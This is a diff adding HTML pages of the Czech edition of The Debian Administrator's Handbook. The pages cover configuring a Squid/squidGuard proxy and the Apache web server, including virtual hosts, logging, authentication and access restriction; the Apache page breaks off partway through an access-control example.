+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.windows-file-server-with-samba.html"
+        title="11.5. Setting Up Windows Shares with Samba" /><link
+        rel="next"
+        href="sect.ldap-directory.html"
+        title="11.7. LDAP Directory" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.http-ftp-proxy.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-file-server-with-samba.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ldap-directory.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.http-ftp-proxy"></a>11.6. HTTP/FTP Proxy</h2></div></div></div><div
+          class="para">
+			An HTTP/FTP proxy acts as an intermediary for HTTP and/or FTP connections. Its role is twofold:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					Caching: recently downloaded documents are copied locally, which avoids multiple downloads.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					Filtering server: if use of the proxy is mandated (and outgoing connections are blocked unless they go through the proxy), then the proxy can determine whether or not the request is to be granted.
+				</div></li></ul></div><a
+          id="id-1.14.9.4"
+          class="indexterm"></a><a
+          id="id-1.14.9.5"
+          class="indexterm"></a><div
+          class="para">
+			Falcot Corp selected Squid as their proxy server.
+		</div><a
+          id="id-1.14.9.7"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.9.8"></a>11.6.1. Installing</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">squid3</span> Debian package only contains the modular (caching) proxy. Turning it into a filtering server requires installing the additional <span
+              class="pkg pkg">squidguard</span> package. In addition, <span
+              class="pkg pkg">squid-cgi</span> provides a querying and administration interface for a Squid proxy.
+			</div><div
+            class="para">
+				Prior to installing, care should be taken to check that the system can identify its own complete name: the <code
+              class="command">hostname -f</code> must return a fully-qualified name (including a domain). If it does not, then the <code
+              class="filename">/etc/hosts</code> file should be edited to contain the full name of the system (for instance, <code
+              class="literal">arrakis.falcot.com</code>). The official computer name should be validated with the network administrator in order to avoid potential name conflicts.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.9.9"></a>11.6.2. Configuring a Cache</h3></div></div></div><div
+            class="para">
+				Enabling the caching server feature is a simple matter of editing the <code
+              class="filename">/etc/squid3/squid.conf</code> configuration file and allowing machines from the local network to run queries through the proxy. The following example shows the modifications made by the Falcot Corp administrators:
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.9.9.3"></a><p
+              class="title"><strong>Příklad 11.25. The <code
+                  class="filename">/etc/squid3/squid.conf</code> file (excerpts)</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
+
+# Example rule allowing access from your local networks. Adapt
+# to list your (internal) IP networks from where browsing should
+# be allowed
+acl our_networks src 192.168.1.0/24 192.168.2.0/24
+http_access allow our_networks
+http_access allow localhost
+# And finally deny all other access to this proxy
+http_access deny all
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.9.10"></a>11.6.3. Configuring a Filter</h3></div></div></div><div
+            class="para">
+				<code
+              class="command">squid</code> itself does not perform the filtering; this action is delegated to <code
+              class="command">squidGuard</code>. The former must then be configured to interact with the latter. This involves adding the following directive to the <code
+              class="filename">/etc/squid3/squid.conf</code> file:
+			</div><a
+            id="id-1.14.9.10.3"
+            class="indexterm"></a><pre
+            class="programlisting">
+url_rewrite_program /usr/bin/squidGuard -c /etc/squid3/squidGuard.conf
+</pre><div
+            class="para">
+				The <code
+              class="filename">/usr/lib/cgi-bin/squidGuard.cgi</code> CGI program also needs to be installed, using <code
+              class="filename">/usr/share/doc/squidguard/examples/squidGuard.cgi.gz</code> as a starting point. Required modifications to this script are the <code
+              class="varname">$proxy</code> and <code
+              class="varname">$proxymaster</code> variables (the name of the proxy and the administrator's contact e-mail, respectively). The <code
+              class="varname">$image</code> and <code
+              class="varname">$redirect</code> variables should point to existing images representing the rejection of a query.
+			</div><div
+            class="para">
+				The filter is enabled with the <code
+              class="command">service squid3 reload</code> command. However, since the <span
+              class="pkg pkg">squidguard</span> package does no filtering by default, it is the administrator's task to define the policy. This can be done by creating the <code
+              class="filename">/etc/squid3/squidGuard.conf</code> file (using <code
+              class="filename">/etc/squidguard/squidGuard.conf.default</code> as template if required).
+			</div><div
+            class="para">
+				The working database must be regenerated with <code
+              class="command">update-squidguard</code> after each change of the <code
+              class="command">squidGuard</code> configuration file (or one of the lists of domains or URLs it mentions). The configuration file syntax is documented on the following website: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.squidguard.org/Doc/configure.html">http://www.squidguard.org/Doc/configure.html</a></div>
+			</div><a
+            id="id-1.14.9.10.8"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> DansGuardian</strong></p></div></div></div><a
+              id="id-1.14.9.10.9.2"
+              class="indexterm"></a><a
+              id="id-1.14.9.10.9.3"
+              class="indexterm"></a><div
+              class="para">
+				The <span
+                class="pkg pkg">dansguardian</span> package is an alternative to <span
+                class="emphasis"><em>squidguard</em></span>. This software does not simply handle a blacklist of forbidden URLs, but it can take advantage of the PICS system (<span
+                class="emphasis"><em>Platform for Internet Content Selection</em></span>) to decide whether a page is acceptable by dynamic analysis of its contents.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-file-server-with-samba.html"><strong>Předcházející</strong>11.5. Setting Up Windows Shares with Samba</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ldap-directory.html"><strong>Další</strong>11.7. LDAP Directory</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-web-server.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-web-server.html
new file mode 100644
index 000000000..07b0f5d5e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-web-server.html
@@ -0,0 +1,683 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.2. Web Server (HTTP)</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="next"
+        href="sect.ftp-file-server.html"
+        title="11.3. FTP File Server" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.http-web-server.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-services.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ftp-file-server.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.http-web-server"></a>11.2. Web Server (HTTP)</h2></div></div></div><div
+          class="para">
+			The Falcot Corp administrators decided to use the Apache HTTP server, included in Debian <span
+            class="distribution distribution">Jessie</span> at version 2.4.10.
+		</div><a
+          id="id-1.14.5.3"
+          class="indexterm"></a><a
+          id="id-1.14.5.4"
+          class="indexterm"></a><a
+          id="id-1.14.5.5"
+          class="indexterm"></a><a
+          id="id-1.14.5.6"
+          class="indexterm"></a><a
+          id="id-1.14.5.7"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Other web servers</strong></p></div></div></div><div
+            class="para">
+			Apache is merely the most widely-known (and widely-used) web server, but there are others; they can offer better performance under certain workloads, but this has its counterpart in the smaller number of available features and modules. However, when the prospective web server is built to serve static files or to act as a proxy, the alternatives, such as <span
+              class="pkg pkg">nginx</span> and <span
+              class="pkg pkg">lighttpd</span>, are worth investigating.
+		</div><a
+            id="id-1.14.5.8.3"
+            class="indexterm"></a><a
+            id="id-1.14.5.8.4"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.9"></a>11.2.1. Installing Apache</h3></div></div></div><div
+            class="para">
+				Installing the <span
+              class="pkg pkg">apache2</span> package is all that is needed. It contains all the modules, including the <span
+              class="emphasis"><em>Multi-Processing Modules</em></span> (MPMs) that affect how Apache handles parallel processing of many requests (those used to be provided in separate <span
+              class="pkg pkg">apache2-mpm-*</span> packages). It will also pull <span
+              class="pkg pkg">apache2-utils</span> containing the command line utilities that we will discover later.
+			</div><div
+            class="para">
+				The MPM in use affects significantly the way Apache will handle concurrent requests. With the <span
+              class="emphasis"><em>worker</em></span> MPM, it uses <span
+              class="emphasis"><em>threads</em></span> (lightweight processes), whereas with the <span
+              class="emphasis"><em>prefork</em></span> MPM it uses a pool of processes created in advance. With the <span
+              class="emphasis"><em>event</em></span> MPM it also uses threads, but the inactive connections (notably those kept open by the HTTP <span
+              class="emphasis"><em>keep-alive</em></span> feature) are handed back to a dedicated management thread.
+			</div><div
+            class="para">
+				The Falcot administrators also install <span
+              class="pkg pkg">libapache2-mod-php5</span> so as to include the PHP support in Apache. This causes the default <span
+              class="emphasis"><em>event</em></span> MPM to be disabled, and <span
+              class="emphasis"><em>prefork</em></span> to be used instead, since PHP only works under that particular MPM.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> Execution under the <code
+                        class="literal">www-data</code> user</strong></p></div></div></div><a
+              id="id-1.14.5.9.5.2"
+              class="indexterm"></a><a
+              id="id-1.14.5.9.5.3"
+              class="indexterm"></a><div
+              class="para">
+				By default, Apache handles incoming requests under the identity of the <code
+                class="literal">www-data</code> user. This means that a security vulnerability in a CGI script executed by Apache (for a dynamic page) won't compromise the whole system, but only the files owned by this particular user.
+			</div><div
+              class="para">
+				Using the <span
+                class="emphasis"><em>suexec</em></span> modules allows bypassing this rule so that some CGI scripts are executed under the identity of another user. This is configured with a <code
+                class="literal">SuexecUserGroup <em
+                  class="replaceable">user</em><em
+                  class="replaceable">group</em></code> directive in the Apache configuration.
+			</div><a
+              id="id-1.14.5.9.5.6"
+              class="indexterm"></a><div
+              class="para">
+				Another possibility is to use a dedicated MPM, such as the one provided by <span
+                class="pkg pkg">libapache2-mpm-itk</span>. This particular one has a slightly different behavior: it allows “isolating” virtual hosts (actually, sets of pages) so that they each run as a different user. A vulnerability in one website therefore cannot compromise files belonging to the owner of another website.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> List of modules</strong></p></div></div></div><div
+              class="para">
+				The full list of Apache standard modules can be found online. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://httpd.apache.org/docs/2.4/mod/index.html">http://httpd.apache.org/docs/2.4/mod/index.html</a></div>
+			</div></div><div
+            class="para">
+				Apache is a modular server, and many features are implemented by external modules that the main program loads during its initialization. The default configuration only enables the most common modules, but enabling new modules is a simple matter of running <code
+              class="command">a2enmod <em
+                class="replaceable">module</em></code>; to disable a module, the command is <code
+              class="command">a2dismod <em
+                class="replaceable">module</em></code>. These programs actually only create (or delete) symbolic links in <code
+              class="filename">/etc/apache2/mods-enabled/</code>, pointing at the actual files (stored in <code
+              class="filename">/etc/apache2/mods-available/</code>).
+			</div><div
+            class="para">
+				With its default configuration, the web server listens on port 80 (as configured in <code
+              class="filename">/etc/apache2/ports.conf</code>), and serves pages from the <code
+              class="filename">/var/www/html/</code> directory (as configured in <code
+              class="filename">/etc/apache2/sites-enabled/000-default.conf</code>).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Adding support for SSL</strong></p></div></div></div><a
+              id="id-1.14.5.9.9.2"
+              class="indexterm"></a><a
+              id="id-1.14.5.9.9.3"
+              class="indexterm"></a><div
+              class="para">
+				Apache 2.4 includes the SSL module required for secure HTTP (HTTPS) out of the box. It just needs to be enabled with <code
+                class="command">a2enmod ssl</code>, then the required directives have to be added to the configuration files. A configuration example is provided in <code
+                class="filename">/etc/apache2/sites-available/default-ssl.conf</code>. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://httpd.apache.org/docs/2.4/mod/mod_ssl.html">http://httpd.apache.org/docs/2.4/mod/mod_ssl.html</a></div>
+			</div><div
+              class="para">
+				Some extra care must be taken if you want to favor SSL connections with <span
+                class="emphasis"><em>Perfect Forward Secrecy</em></span> (those connections use ephemeral session keys ensuring that a compromission of the server's secret key does not result in the compromission of old encrypted traffic that could have been stored while sniffing on the network). Have a look at Mozilla's recommandations in particular: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.mozilla.org/Security/Server_Side_TLS#Apache">https://wiki.mozilla.org/Security/Server_Side_TLS#Apache</a></div>
+			</div><a
+              id="id-1.14.5.9.9.6"
+              class="indexterm"></a></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.10"></a>11.2.2. Configuring Virtual Hosts</h3></div></div></div><div
+            class="para">
+				A virtual host is an extra identity for the web server.
+			</div><a
+            id="id-1.14.5.10.3"
+            class="indexterm"></a><div
+            class="para">
+				Apache considers two different kinds of virtual hosts: those that are based on the IP address (or the port), and those that rely on the domain name of the web server. The first method requires allocating a different IP address (or port) for each site, whereas the second one can work on a single IP address (and port), and the sites are differentiated by the hostname sent by the HTTP client (which only works in version 1.1 of the HTTP protocol — fortunately that version is old enough that all clients use it already).
+			</div><div
+            class="para">
+				The (increasing) scarcity of IPv4 addresses usually favors the second method; however, it is made more complex if the virtual hosts need to provide HTTPS too, since the SSL protocol hasn't always provided for name-based virtual hosting; the SNI extension (<span
+              class="emphasis"><em>Server Name Indication</em></span>) that allows such a combination is not handled by all browsers. When several HTTPS sites need to run on the same server, they will usually be differentiated either by running on a different port or on a different IP address (IPv6 can help there).
+			</div><div
+            class="para">
+				The default configuration for Apache 2 enables name-based virtual hosts. In addition, a default virtual host is defined in the <code
+              class="literal">/etc/apache2/sites-enabled/000-default.conf</code> file; this virtual host will be used if no host matching the request sent by the client is found.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> First virtual host</strong></p></div></div></div><div
+              class="para">
+				Requests concerning unknown virtual hosts will always be served by the first defined virtual host, which is why we defined <code
+                class="literal">www.falcot.com</code> first here.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> Apache supports SNI</strong></p></div></div></div><a
+              id="id-1.14.5.10.8.2"
+              class="indexterm"></a><div
+              class="para">
+				The Apache server supports an SSL protocol extension called <span
+                class="emphasis"><em>Server Name Indication</em></span> (SNI). This extension allows the browser to send the hostname of the web server during the establishment of the SSL connection, much earlier than the HTTP request itself, which was previously used to identify the requested virtual host among those hosted on the same server (with the same IP address and port). This allows Apache to select the most appropriate SSL certificate for the transaction to proceed.
+			</div><div
+              class="para">
+				Before SNI, Apache would always use the certificate defined in the default virtual host. Clients trying to access another virtual host would then display warnings, since the certificate they received didn't match the website they were trying to access. Fortunately, most browsers now work with SNI; this includes Microsoft Internet Explorer starting with version 7.0 (starting on Vista), Mozilla Firefox starting with version 2.0, Apple Safari since version 3.2.1, and all versions of Google Chrome.
+			</div><div
+              class="para">
+				The Apache package provided in Debian is built with support for SNI; no particular configuration is therefore needed.
+			</div><div
+              class="para">
+				Care should also be taken to ensure that the configuration for the first virtual host (the one used by default) does enable TLSv1, since Apache uses the parameters of this first virtual host to establish secure connections, and they had better allow them!
+			</div></div><div
+            class="para">
+				Each extra virtual host is then described by a file stored in <code
+              class="filename">/etc/apache2/sites-available/</code>. Setting up a website for the <code
+              class="literal">falcot.org</code> domain is therefore a simple matter of creating the following file, then enabling the virtual host with <code
+              class="command">a2ensite www.falcot.org</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.10.10"></a><p
+              class="title"><strong>Příklad 11.16. The <code
+                  class="filename">/etc/apache2/sites-available/www.falcot.org.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+&lt;VirtualHost *:80&gt;
+ServerName www.falcot.org
+ServerAlias falcot.org
+DocumentRoot /srv/www/www.falcot.org
+&lt;/VirtualHost&gt;
+</pre></div></div><div
+            class="para">
+				The Apache server, as configured so far, uses the same log files for all virtual hosts (although this could be changed by adding <code
+              class="literal">CustomLog</code> directives in the definitions of the virtual hosts). It therefore makes good sense to customize the format of this log file to have it include the name of the virtual host. This can be done by creating a <code
+              class="filename">/etc/apache2/conf-available/customlog.conf</code> file that defines a new format for all log files (with the <code
+              class="literal">LogFormat</code> directive) and by enabling it with <code
+              class="command">a2enconf customlog</code>. The <code
+              class="literal">CustomLog</code> line must also be removed (or commented out) from the <code
+              class="filename">/etc/apache2/sites-available/000-default.conf</code> file.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.10.12"></a><p
+              class="title"><strong>Příklad 11.17. The <code
+                  class="filename">/etc/apache2/conf.d/customlog.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting scale">
+# New log format including (virtual) host name
+LogFormat "%v %h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\"" vhost
+
+# Now let's use this "vhost" format by default
+CustomLog /var/log/apache2/access.log vhost
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.11"></a>11.2.3. Common Directives</h3></div></div></div><div
+            class="para">
+				This section briefly reviews some of the commonly-used Apache configuration directives.
+			</div><a
+            id="id-1.14.5.11.3"
+            class="indexterm"></a><a
+            id="id-1.14.5.11.4"
+            class="indexterm"></a><div
+            class="para">
+				The main configuration file usually includes several <code
+              class="literal">Directory</code> blocks; they allow specifying different behaviors for the server depending on the location of the file being served. Such a block commonly includes <code
+              class="literal">Options</code> and <code
+              class="literal">AllowOverride</code> directives.
+			</div><a
+            id="id-1.14.5.11.6"
+            class="indexterm"></a><a
+            id="id-1.14.5.11.7"
+            class="indexterm"></a><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.11.8"></a><p
+              class="title"><strong>Příklad 11.18. Directory block</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+&lt;Directory /var/www&gt;
+Options Includes FollowSymlinks
+AllowOverride All
+DirectoryIndex index.php index.html index.htm
+&lt;/Directory&gt;
+</pre></div></div><div
+            class="para">
+				The <code
+              class="literal">DirectoryIndex</code> directive contains a list of files to try when the client request matches a directory. The first existing file in the list is used and sent as a response.
+			</div><a
+            id="id-1.14.5.11.10"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="literal">Options</code> directive is followed by a list of options to enable. The <code
+              class="literal">None</code> value disables all options; correspondingly, <code
+              class="literal">All</code> enables them all except <code
+              class="literal">MultiViews</code>. Available options include:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ExecCGI</code> indicates that CGI scripts can be executed. <a
+                    id="id-1.14.5.11.12.1.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">FollowSymlinks</code> tells the server that symbolic links can be followed, and that the response should contain the contents of the target of such links. <a
+                    id="id-1.14.5.11.12.2.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SymlinksIfOwnerMatch</code> also tells the server to follow symbolic links, but only when the link and the its target have the same owner. <a
+                    id="id-1.14.5.11.12.3.1.2"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">Includes</code> enables <span
+                    class="emphasis"><em>Server Side Includes</em></span> (<span
+                    class="emphasis"><em>SSI</em></span> for short). These are directives embedded in HTML pages and executed on the fly for each request. <a
+                    id="id-1.14.5.11.12.4.1.4"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">Indexes</code> tells the server to list the contents of a directory if the HTTP request sent by the client points at a directory without an index file (ie, when no files mentioned by the <code
+                    class="literal">DirectoryIndex</code> directive exists in this directory). <a
+                    id="id-1.14.5.11.12.5.1.3"
+                    class="indexterm"></a>
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">MultiViews</code> enables content negotiation; this can be used by the server to return a web page matching the preferred language as configured in the browser. <a
+                    id="id-1.14.5.11.12.6.1.2"
+                    class="indexterm"></a>
+					</div></li></ul></div><div
+            class="para">
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> <code
+                        class="filename">.htaccess</code> file</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="filename">.htaccess</code> file contains Apache configuration directives enforced each time a request concerns an element of the directory where it is stored. The scope of these directives also recurses to all the subdirectories within.
+			</div><a
+              id="id-1.14.5.11.14.3"
+              class="indexterm"></a><div
+              class="para">
+				Most of the directives that can occur in a <code
+                class="literal">Directory</code> block are also legal in a <code
+                class="filename">.htaccess</code> file.
+			</div></div><div
+            class="para">
+				The <code
+              class="literal">AllowOverride</code> directive lists all the options that can be enabled or disabled by way of a <code
+              class="filename">.htaccess</code> file. A common use of this option is to restrict <code
+              class="literal">ExecCGI</code>, so that the administrator chooses which users are allowed to run programs under the web server's identity (the <code
+              class="literal">www-data</code> user).
+			</div><a
+            id="id-1.14.5.11.16"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.5.11.17"></a>11.2.3.1. Requiring Authentication</h4></div></div></div><a
+              id="id-1.14.5.11.17.2"
+              class="indexterm"></a><div
+              class="para">
+					In some circumstances, access to part of a website needs to be restricted, so only legitimate users who provide a username and a password are granted access to the contents.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.5.11.17.4"></a><p
+                class="title"><strong>Příklad 11.19. <code
+                    class="filename">.htaccess</code> file requiring authentication</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+Require valid-user
+AuthName "Private directory"
+AuthType Basic
+AuthUserFile /etc/apache2/authfiles/htpasswd-private
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> No security</strong></p></div></div></div><div
+                class="para">
+					The authentication system used in the above example (<code
+                  class="literal">Basic</code>) has minimal security as the password is sent in clear text (it is only encoded as <span
+                  class="emphasis"><em>base64</em></span>, which is a simple encoding rather than an encryption method). It should also be noted that the documents “protected” by this mechanism also go over the network in the clear. If security is important, the whole HTTP connection should be encrypted with SSL.
+				</div></div><div
+              class="para">
+					The <code
+                class="filename">/etc/apache2/authfiles/htpasswd-private</code> file contains a list of users and passwords; it is commonly manipulated with the <code
+                class="command">htpasswd</code> command. For example, the following command is used to add a user or change their password: <a
+                id="id-1.14.5.11.17.6.3"
+                class="indexterm"></a>
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>htpasswd /etc/apache2/authfiles/htpasswd-private <em
+                    class="replaceable">user</em>
+</code></strong><code
+                class="computeroutput">New password:
+Re-type new password:
+Adding password for user <em
+                  class="replaceable">user</em>
+</code></pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.5.11.18"></a>11.2.3.2. Restricting Access</h4></div></div></div><a
+              id="id-1.14.5.11.18.2"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Require</code> directive controls access restrictions for a directory (and its subdirectories, recursively).
+				</div><a
+              id="id-1.14.5.11.18.4"
+              class="indexterm"></a><a
+              id="id-1.14.5.11.18.5"
+              class="indexterm"></a><a
+              id="id-1.14.5.11.18.6"
+              class="indexterm"></a><div
+              class="para">
+					It can be used to restrict access based on many criteria; we will stop at describing access restriction based on the IP address of the client, but it can be made much more powerful than that, especially when several <code
+                class="literal">Require</code> directives are combined within a <code
+                class="literal">RequireAll</code> block.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.5.11.18.8"></a><p
+                class="title"><strong>Příklad 11.20. Only allow from the local network</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">Require ip 192.168.0.0/16
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Old syntax</strong></p></div></div></div><div
+                class="para">
+					The <code
+                  class="literal">Require</code> syntax is only available in Apache 2.4 (the version in <span
+                  class="distribution distribution">Jessie</span>). For users of <span
+                  class="distribution distribution">Wheezy</span>, the Apache 2.2 syntax is different, and we describe it here mainly for reference, although it can also be made available in Apache 2.4 using the <code
+                  class="literal">mod_access_compat</code> module.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">Allow from</code> and <code
+                  class="literal">Deny from</code> directives control access restrictions for a directory (and its subdirectories, recursively).
+				</div><a
+                id="id-1.14.5.11.18.9.4"
+                class="indexterm"></a><a
+                id="id-1.14.5.11.18.9.5"
+                class="indexterm"></a><a
+                id="id-1.14.5.11.18.9.6"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">Order</code> directive tells the server of the order in which the <code
+                  class="literal">Allow from</code> and <code
+                  class="literal">Deny from</code> directives are applied; the last one that matches takes precedence. In concrete terms, <code
+                  class="literal">Order deny,allow</code> allows access if no <code
+                  class="literal">Deny from</code> applies, or if an <code
+                  class="literal">Allow from</code> directive does. Conversely, <code
+                  class="literal">Order allow,deny</code> rejects access if no <code
+                  class="literal">Allow from</code> directive matches (or if a <code
+                  class="literal">Deny from</code> directive applies).
+				</div><div
+                class="para">
+					The <code
+                  class="literal">Allow from</code> and <code
+                  class="literal">Deny from</code> directives can be followed by an IP address, a network (such as <code
+                  class="literal">192.168.0.0/255.255.255.0</code>, <code
+                  class="literal">192.168.0.0/24</code> or even <code
+                  class="literal">192.168.0</code>), a hostname or a domain name, or the <code
+                  class="literal">all</code> keyword, designating everyone.
+				</div><div
+                class="para">
+					For instance, to reject connections by default but allow them from the local network, you could use this:
+				</div><pre
+                class="programlisting">
+Order deny,allow
